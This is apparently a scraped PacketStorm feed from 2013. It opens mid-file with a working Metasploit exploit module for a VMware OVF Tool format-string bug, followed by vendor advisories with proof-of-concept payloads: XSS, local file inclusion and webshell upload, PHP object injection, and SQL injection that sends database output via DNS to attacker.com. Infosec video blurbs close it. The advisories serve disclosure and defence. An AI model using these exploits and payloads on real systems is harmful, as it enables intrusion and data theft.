'Platform' => 'win', 'Targets' => [ # vmware-ovftool-2.1.0-467744-win-i386.msi [ 'VMWare OVF Tools 2.1 on Windows XP SP3', { 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 'AddrPops' => 98, 'StackPadding' => 38081, 'Alignment' => 4096 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 08 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']), ], self.class) end def ovf my_payload = rand_text_alpha(4) # ebp my_payload << [target.ret].pack("V") # eip # call esp my_payload << payload.encoded fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 fs << my_payload # 65536 => 0x10000 # 27 => Error message prefix length fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) fs << "%08x" * target['AddrPops'] # Reach saved EBP fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 ovf_file = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <References> <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> </References> <DiskSection> <Info>Virtual disk information</Info> <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> </DiskSection> <VirtualSystem ovf:id="Small VM"> <Info>A virtual machine</Info> </VirtualSystem> </Envelope> EOF ovf_file end def exploit print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1") file_create(ovf) end end Source: PacketStorm

The Microsoft Skype GiftCards application suffers from multiple cross site scripting vulnerabilities. Title: ====== Microsoft Skype Shop - GiftCards Persistent Vulnerability Date: ===== 2013-01-30 References: =========== http://www.vulnerability-lab.com/get_content.php?id=826 MICROSOFT SECURITY RESPONSE CENTER (MSRC) ID: 13603 MICROSOFT SECURITY RESPONSE CENTER (MSRC) MANAGER: CL VL-ID: ===== 826 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer, and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com. Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia. Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype`s original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple persistent persistent web vulnerabilities in the Microsoft Skype GiftCards application. Report-Timeline: ================ 2013-01-03: Researcher Notification & Coordination 2013-01-09: Vendor Notification 2013-01-10: Vendor Response/Feedback 2013-01-29: Vendor Fix/Patch (MSRC) 2013-01-30: Public Disclosure Status: ======== Published Affected Products: ================== Microsoft Corp. Product: Skype Shop 2013 Q1 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation web vulnerabilities are detected in the official Microsoft Skype GiftCards application. The vulnerability allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The vulnerabilities are located in the skype shop gift cards module when processing to list the giftcard of the buyer or customer. The script code will be injected via the send giftcard function and allows an attacker to inject persistent script code as name, message and information details. The code will be executed in the review module but also at the end in the giftcard which will be send to the customer or friend. The vulnerability can be exploited without application user account and with low required user interaction. Successful exploitation of the persistent input validation web vulnerability result in persistent session hijacking, persistent phishing, external redirect, external malware loads and persistent vulnerable module context manipulation. Vulnerable Service(s): [+] Microsoft Corp. - Skype [Shop Service] Vulnerable Module(s): [+] Skype GiftCards Vulnerable Parameter(s): [+] An (to)- Name [+] Von (from) - Name [+] Vorname oder Rufname [+] Gift Card Message Body Proof of Concept: ================= The vulnerability can be exploited by remote attackers without privileged application user account and with low required user interaction. For demonstration or reproduce ... Review: Skype GiftCards - Name <tbody><tr> <td valign="middle" width="100%"> <table width="100%" border="0" cellpadding="20" cellspacing="0"> <tbody><tr> <td class="inner_cell" valign="middle" width="100%"> <!-- // Begin Module: Standard Header Text \\ --> <h1 style="font-family: 'Segoe UI', Arial, Helvetica, sans-serif; font-size: 24px; font-weight: normal; color: #666666; display: block; line-height: 120%; margin: 0;text-align: left;"> Hallo, <[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]">. <br /> Review: Skype GiftCards - Ecard and Message Text <!-- // Begin Module: Ecard and Message Text \\ --><td class="inner_cell" valign="middle" width="50%"><!-- MAX Chart 30 --><h4 class="h4" style="font-family: 'Segoe UI', Arial, Helvetica, sans-serif;font-size: 16px; font-weight: bold; color: #999999; display: block; line-height: 100%; margin: 0; text-align: left;">An <[PERSISTENT INJECTED SCRIPT CODE!]%20_[PERSISTENT INJECTED SCRIPT CODE!]">,</h4><br /><!-- MAX Chart 80 --><iframe src=a>%20[PERSISTENT INJECTED SCRIPT CODE!]") <<br /><br /><!-- MAX Chart 250 --><iframe src=a>%20[PERSISTENT INJECTED SCRIPT CODE!]") <<br /><br /><!-- MAX Chart 28 --><h4 Reference(s): Service: http://shop.skype.com/skype-gift-cards Module: https://de.chatandvision.com/skype_giftcard/payment#preview_div Insert: https://de.chatandvision.com/skype_giftcard/personalize Listing: https://de.chatandvision.com/skype_giftcard/payment https://de.chatandvision.com/skype_giftcard/payment Solution: ========= 2013-01-29: Vendor Fix/Patch (MSRC) Risk: ===== The security risk of the persistent input validation web vulnerabilities is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm

WirelessFiles version 1.1 suffers from local file inclusion and remote file access vulnerabilities. Title: ====== WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-06 References: =========== http://www.vulnerability-lab.com/get_content.php?id=847 VL-ID: ===== 848 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: ============= This application starts a web server on your device and allows downloads and uploads of any files from it using any browser on any other computer or device. No cables, drivers or clients are necessary, just a browser. Right from this application you can send these files to any other application ready to accept this file type. Or, you can send the files to Wireless Files for further download to your computer. There is no problems with national file names. With this program You have web access to photos and videos on your device. Show your photos in a nice Web Album on big screen without cables and so on. For that, you need to enter your web-server from any computer using LAN or WWAN address. Just type one of the indicated addresses in the address bar of your browser (Internet Explorer, Mozilla Firefox, Safari or any others). Also, you can start WirelessFiles on one device, enter the web-server in your browser from another device, and transfer your photos,for example,to the first device, and then put them in Camera Roll. (The transfer of photos to and from Camera Roll is available only in iOS 6 and up). For all this to work, you need to have a working connection to the network where your device is located. For LAN,It usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In case you experience problems with connection, contact a specialist – this can be easily adjusted. It’s much harder with WWAN. It’s a network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN. Still, if Internet access on your computer is provided by the same operator, everything will get connected and running. The application wouldn’t work in the background, so it switches off autoblocking while running. Any unexpected calls will interrupt your file transfer. By default, the application allows storing a limited number of files – no more than 3 of them; with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89. Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / €0.89. Still, if something isn’t working, DO NOT buy removal of restrictions – this will not improve operability of the system itself. Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application include basic protection of the web-server from unauthorized access. (Copy of the Homepage: https://itunes.apple.com/de/app/wirelessfiles/id573161053 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile WirelessFiles v1.1 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-06: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: WirelessFiles Application - (iPad & iPhone) 1.1 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. 1.1 The main vulnerbility is located in the upload file submit formular of the webserver (http://192.168.0.10/) when processing to load a manipulated filename via POST. The execution of the injected path or file request will occur when the attacker is watching the file index listing. 1.2 Attackers can also unauthorized implement mobile webshells by using a double filename extension (bild.js.php.jpg) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver listing to compromise the apple iphone or ipad. Exploitation of the local file include web vulnerability does not require user interaction but a low privileged user account (standard pass blank). Successful exploitation of the local web vulnerability results in ipad or iphone compromise via file include attack. Vulnerable Application(s): [+] WirelessFiles - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload via Submit (Web Server) [Remote] Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Filename - Listing [+] Webalbum Filename - Listing Proof of Concept: ================= 1.1 The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... Local File Include - PoC (POST) POSTDATA =-----------------------------200962619920015 Content-Disposition: form-data; name="value"; filename="../../../../cmd>home>tmp.png" # < Include Path & File Content-Type: image/png -- Authorization=Digest username="ben37", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3" Review: Filename - (Upload) Listing <tbody><tr class="styleZag"> <th scope="col" width="50%"><div align="left"> File Name</div></th> <th scope="col" width="25%"><span>Date and Time</span></th> <th scope="col" width="25%"><div align="right">Size</div></th> </tr> <tr class="styleRow"> <th scope="col" width="50%"><div align="left"> <a href="http://192.168.0.10/../../../../cmd>home>tmp.png?%00"> <../../../../cmd>home>tmp.png?%00">%20%20%20%20</a></div></th> 1.2 The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... Unauthroized File Upload/Access (Webshell) POSTDATA =-----------------------------200962619920015 Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg" # < Include File with multiple file extensions Content-Type: image/png -- Authorization=Digest username="ben38", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3" Review: Filename - (Upload) Listing <tbody><tr class="styleZag"> <th scope="col" width="50%"><div align="left"> File Name</div></th> <th scope="col" width="25%"><span>Date and Time</span></th> <th scope="col" width="25%"><div align="right">Size</div></th> </tr> <tr class="styleRow"> <th scope="col" width="50%"><div align="left"> <a href="http://192.168.0.10/hacking.js.php.jpg"><a href=hacking.js.php.jpg></a>%20%20%20%20</a></div></th> Risk: ===== The security risk of the local file include web vulnerability and unauthorized file upload/access bug are estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm

CubeCart versions 5.0.0 through 5.2.0 suffer from a PHP object injection vulnerability in cubecart.class.php. ------------------------------------------------------------------------- CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability ------------------------------------------------------------------------- [-] Software Link: http://www.cubecart.com/ [-] Affected Versions: All versions from 5.0.0 to 5.2.0 [-] Vulnerability Description: The vulnerable code is located in the Cubecart::_basket() method defined in the /classes/cubecart.class.php script: 519. // Update shipping values 520. if (isset($_POST['shipping']) && !empty($_POST['shipping'])) { 521. $GLOBALS['cart']->set('shipping', unserialize(base64url_decode($_POST['shipping']))); 522. if (!isset($_POST['proceed'])) { 523. httpredir(currentPage()); 524. } 525. } User input passed through the $_POST['shipping'] parameter is not properly sanitized before being used in an unserialize() call at line 521. This can be exploited to inject an arbitrary object into the application scope. For e.g. the destructor method of the "Config" class could be abused: 78. public function __destruct() { 79. //Do we need to write to the db 80. if ($this->_write_db) { 81. $this->_writeDB(); 82. } 83. } By sending a specially crafted serialized "Config" object, an attacker might be able to change the application configuration settings with arbitrary values, and this can lead to make the application vulnerable to malicious attacks such as Cross-Site Scripting, SQL Injection or Denial of Service. [-] Solution: Upgrade to version 5.2.1 or higher. [-] Disclosure Timeline: [27/01/2013] - Issue reported to http://bugs.cubecart.com/view.php?id=511 [31/01/2013] - Version 5.2.1 released: http://forums.cubecart.com/?showtopic=47026 [31/01/2013] - CVE number requested [04/02/2013] - CVE number assigned [06/02/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1465 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-02 Source: PacketStorm

WordPress CommentLuv version 2.92.3 suffers from a cross site scripting vulnerability. Advisory ID: HTB23138 Product: CommentLuv WordPress plugin Vendor: Andy Bailey Vulnerable Version(s): 2.92.3 and probably prior Tested Version: 2.92.3 Vendor Notification: January 16, 2013 Vendor Patch: January 17, 2013 Public Disclosure: February 6, 2013 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2013-1409 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in CommentLuv WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Cross-Site Scripting (XSS) in CommentLuv wordpress plugin: CVE-2013-1409 The vulnerability exists due to insufficient filtration of user-supplied data in "_ajax_nonce" HTTP POST parameter in the "/wp-admin/admin-ajax.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display administrator's cookies: <form action="http://[host]/wp-admin/admin-ajax.php" method="post" name="askform"> <input type="hidden" name="action" value="cl_ajax" /> <input type="hidden" name="do" value="fetch" /> <input type="hidden" name="url" value="1" /> <input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Upgrade to CommentLuv 2.92.4 More Information: http://wordpress.org/extend/plugins/commentluv/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23138 - https://www.htbridge.com/advisory/HTB23138 - Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin. [2] CommentLuv - http://www.commentluv.com/ - CommentLuv is a popular WordPress plugin that will magnetize your readers, socialize your comments and viralize your posts. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: PacketStorm

WordPress Wysija Newsletters plugin version 2.2 suffers from cross site request forgery and remote SQL injection vulnerabilities. Advisory ID: HTB23140 Product: Wysija Newsletters WordPress plugin Vendor: Wysija Vulnerable Version(s): 2.2 and probably prior Tested Version: 2.2 Vendor Notification: January 16, 2013 Vendor Patch: January 18, 2013 Public Disclosure: February 6, 2013 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2013-1408 Risk Level: Medium CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Wysija Newsletters WordPress plugin, which can be exploited to perform SQL Injection attacks. 1) SQL Injections in Wysija Newsletters WordPress plugin: CVE-2013-1408 The vulnerabilities exist due to insufficient filtration of user-supplied input passed via the "search" and "orderby" HTTP GET parameters to the "/wp-admin/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=wysija_campaigns&orderby=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to cross-site request forgery attacks. In order to do so an attacker should trick the logged-in administrator into visiting a web page with CSRF exploit. Basic CSRF exploit: <img src="http://[host]/wp-admin/admin.php?page=wysija_campaigns&orderby=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- "> ----------------------------------------------------------------------------------------------- Solution: Upgrade to Wysija Newsletters 2.2.1 More Information: http://wordpress.org/extend/plugins/wysija-newsletters/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23140 - https://www.htbridge.com/advisory/HTB23140 - SQL Injection vulnerability in Wysija Newsletters WordPress plugin. [2] Wysija Newsletters - http://www.wysija.com/ - A new and simple newsletter solution for WordPress. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: PacketStorm

The VK social network at vk.com suffers from an open redirection vulnerability. ÿþ+++++++++++ # Exploit Title :VK (social network) URL Redirector Abuse # *Vendor*: www.vk.com # Author: Juan Carlos García (NightSec) # Blog: http://hackingmadrid.blogspot.com # Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196 ************************************************************************************* BREIF DESCRIPTION ************************************************************************************** VK (Originally VKontakte, Russian: >=B0:B5)[3] is a European social network service popular among Russian-speaking users around the world. It is especially popular in Russia, Ukraine, Kazakhstan, Moldova, Belarus, and Israel. VK is a Facebook clone, with several common features, such as university exclusiveness of a network during its early stages, similar color, and similar features and functionality. VK is able to hold the position, the main countries, and successfully move ahead in Europe and America, despite efforts of the American network. Like other social networks, VK allows users to message contacts publicly or privately, create groups, public pages and events, share and tag images, audio and video, and play browser-based games. ********************************* ********************************* URL Redirector Abuse PoC http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Hackingmadrid http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Ethical Hacking y ole by the face http://vk.com/away.php?feature=share&post=193_594&to=http://www.hackingmadrid.blogspot.com http://vk.com/away.php?to=http://hackingmadrid.blogspot.com http://vk.com/away.php?to=http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196 http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org Procedure:Open de link given above ************************************************************************** Give special thanks to all the people who follow me on Ethical Hacking and Ole by the Face .. Thanks guys ************************************************************************************* Source: PacketStorm

Description: At the moment would you opt to use an Applet, Web Start app or even a JavaFX for a new project? Team HackoGram has shown in this video, how easy is it to exploit the latest JAVA. We recommend users to uninstall JAVA for few days, we will update you once a fully patched version is available. View Full Post : Java Signed Applet Vulnerability – Oracle! | HackoGram | Tech with Beats Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Java Signed Applet Vulnerability Exploit – Oracle

Description: In this video I will show you how to use Pentbox tool. This tool you can use for various purpose like cracking hashes, network information gathering, Web HTTP brute-force attack etc.. Also you can use this tool as a fuzzer. PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems. Programmed in Ruby. http://www.pentbox.net/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Pentbox Tool Usage

Description: In this video I will show you how to use Powershell scripts for post – exploitation, but I’m not actually using a script but using commands as a script. You can use readymade script or create a script as per your requirement. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post -- Exploitation Using Powershell

Description: Commercial spyware is available for mobile devices, including iPhones, Android Smartphones, BlackBerries, and Nokias. Many of the vendors claim that their software and its operation is undetectable on the smartphones after setup is complete. Is this true? Is there a way to identify whether or not some jerk installed spyware on your mobile phone or are you destined to be PWN'd? This presentation examines the operation and trails left by five different commercial spyware products for mobile devices. Research for both Android and iPhone 4S will be given. A list of results from physical dumps, file system captures, and user files will be presented to show how stealthy the spyware really was. The results from the analysis of the install files will also be presented. From this information a list of indicators will be presented to determine whether or not spyware is on your phone. Michael Robinson a/k/a Flash, conducts forensic examinations of computers and mobile devices for consulting firm in the Washington, DC area. In addition to his day job, he teaches graduate level courses in computer forensics and mobile device forensics at Stevenson University and George Mason University. Prior to his current consulting gig, Flash conducted computer forensic examinations in support of federal law enforcement. He worked for the Department of Defense for a bunch of years doing IT and forensics work. Flash has been in school forever. Eventually he'll get smart. He's building on his Master's in Computer Forensics with a Doctorate in the same field. Chris Taylor is a security researcher and teacher that has been doing IT security, incident response, computer forensics, and mobile device forensics for the last 12 years. His experience comes from doing research, not reading research. Imagine that. He makes fun of his co-presenter constantly. He is also a staunch privacy advocate that hates writing bios. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Spy Vs Spy: Spying On Mobile Device Spyware

Eroarea aia imi aparea pe youtube, iar dupa ce am instalat flash 11 (aveam 10) a mers fara probleme.

Description: Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that gives Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter. Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sploitego - Maltego's (Local) Partner In Crime